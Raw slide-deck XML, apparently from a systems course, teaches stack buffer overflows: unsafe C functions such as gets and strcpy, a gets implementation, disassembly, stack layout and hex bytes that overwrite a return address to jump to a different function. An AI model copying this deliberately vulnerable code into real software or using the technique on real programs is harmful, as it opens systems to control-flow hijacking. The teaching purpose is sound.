              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Less-direct:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – copy arbitrary-length strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"%s"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> conversion specification used</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9A2F9414-D6F3-3A4D-A64E-BF52786A52CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761998" y="2423819"/>
            <a:ext cx="5257801" cy="302448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gets: read newline-terminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   string from stdin into s. */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char *gets(char *s) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    int c;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    char *p = s;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    while (((c = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()) != EOF) &amp;&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           (c != '\n')) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        *p++ = c;</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 = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    return s;</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31895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90343901-DCAB-1044-B9AF-71839BFABDC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1400174" y="1503279"/>
            <a:ext cx="9391651" cy="48286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caller()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.\n");</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not_caller</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("Did not return to caller! (insert maniacal laugh here)\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    exit(0);</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78997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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1007F905-7BF7-1E48-AC7D-8440841CD513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9067800" y="1508936"/>
            <a:ext cx="2882900" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack grows by 24 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer starts 8 bytes above stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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90343901-DCAB-1044-B9AF-71839BFABDC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369052" y="1626071"/>
            <a:ext cx="8795928" cy="433568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400612:       bf 5f 07 40 00          mov    $0x40075f,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400617:       b8 00 00 00 00          mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40061c:       e8 bf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4004e0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf@plt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400621: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400626:       e8 c5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4004f0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets@plt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40062b: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400630:       e8 9b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400635:       48 83 c4 18             add    $0x18,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400639: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0" name="Oval 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21FBD7A2-640B-D843-B341-9F0B545F7214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372477" y="2273300"/>
            <a:ext cx="2374900"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76CEB8F-D023-3B4B-A8CC-9FA6DA2CBE29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232776" y="3971479"/>
            <a:ext cx="3377823"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A48ECE51-447D-914C-8B46-CAD0729CB794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9194580" y="4219011"/>
            <a:ext cx="2890381" cy="2411388"/>
            <a:chOff x="9194580" y="4219011"/>
            <a:chExt cx="2890381" cy="2411388"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D675A8BF-B583-3342-B746-B96D7FE29282}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10614977" y="4941608"/>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E9500474-45A2-B447-8BA6-B40B41059051}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10614977" y="4374448"/>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16" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3B7E5E2-EE5D-5E41-A162-AA425676F8A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10614977" y="5508768"/>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B262C8F3-CD99-7441-984A-8A20B4AD00EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10614977" y="6063239"/>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3133B6BF-A7EE-5C4F-B187-073ACBC46E90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9663426" y="6176963"/>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19" name="Straight Arrow Connector 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F91ACABD-2F18-5140-8773-32DFFFA167F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="11" idx="3"/>
              <a:endCxn id="17" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10300973" y="6346819"/>
              <a:ext cx="314004" cy="1481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F05CF1-CD84-F347-A4B1-9503825F6DCE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9430927" y="5569808"/>
              <a:ext cx="870046" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>buffer</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>%rsp+8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{260DACDD-13E1-F94F-AF45-0A5AED2C9B0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="21" idx="3"/>
              <a:endCxn id="16" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10300973" y="5792348"/>
              <a:ext cx="314004" cy="10062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AD7223B-CB31-BA4B-8CD9-6EC838189A09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9308394" y="4902022"/>
              <a:ext cx="992579" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>buffer+8</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>%rsp+16</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="28" name="Straight Arrow Connector 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BB5CB54-727F-4C4E-B06B-59724065BA32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="27" idx="3"/>
              <a:endCxn id="14" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10300973" y="5225188"/>
              <a:ext cx="314004"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C40CD45-CC58-F44D-9DB2-BF6A51A15684}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9194580" y="4219011"/>
              <a:ext cx="1106393" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>buffer+16</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>%rsp+24</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Arrow Connector 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A00FCF8C-3D09-D348-A070-9EF58D4B8477}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="32" idx="3"/>
              <a:endCxn id="15" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10300973" y="4542177"/>
              <a:ext cx="314004" cy="11585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190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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="10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5"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randombar(vertical)">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D0833ADB-CC0E-D645-BCDB-A982C51F194C}"/>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0x70	0x06	0x40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0x48	0x06	0x40	0x00	0x00	0x00	0x00	0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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No buffer overflow</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13</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9" y="1881688"/>
            <a:ext cx="4203702"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111" name="Oval 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F219790C-4D2A-C14E-8395-70B68F5944AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752601" y="5588000"/>
            <a:ext cx="2159000"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509D49C3-BF8C-2240-B9B7-996C32B7DF96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769755" y="5384077"/>
            <a:ext cx="2159000" cy="3078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59AD8EEB-37C4-8642-8EF2-C449F6F0E4F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2849255" y="4625694"/>
            <a:ext cx="700185" cy="758383"/>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20" name="TextBox 119">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F52F883C-9296-6748-8F1F-4B497E385FD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1218449" y="4256362"/>
            <a:ext cx="4661982" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Values left over from earlier use of this memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="TextBox 120">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFD2575F-4D90-564B-8A09-A2D206D16060}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3133599" y="6024387"/>
            <a:ext cx="1556003" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Rounded Rectangle 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D34DD0D6-53B1-D346-AA59-A7F10FAC8B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974939" y="5053898"/>
            <a:ext cx="7204753" cy="1822542"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="1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FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000000040063a &lt;caller&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40063a:   48 83 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 08         sub    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40063e:   b8 00 00 00 00      mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400643:   e8 b7 ff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4005ff &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buffer_too_small</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400648:   bf 30 07 40 00      mov    $0x400730,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40064d:   e8 7e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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4004d0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>puts@plt</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400652:   48 83 c4 08         add    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400656:   c3                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retq</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FA00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="113" name="Elbow Connector 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55D4F4AF-B87A-C648-B20B-A4099FA6E81C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="111" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4061003" y="4728429"/>
            <a:ext cx="109408" cy="2567213"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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17980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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="117"/>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119"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11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20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12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17"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
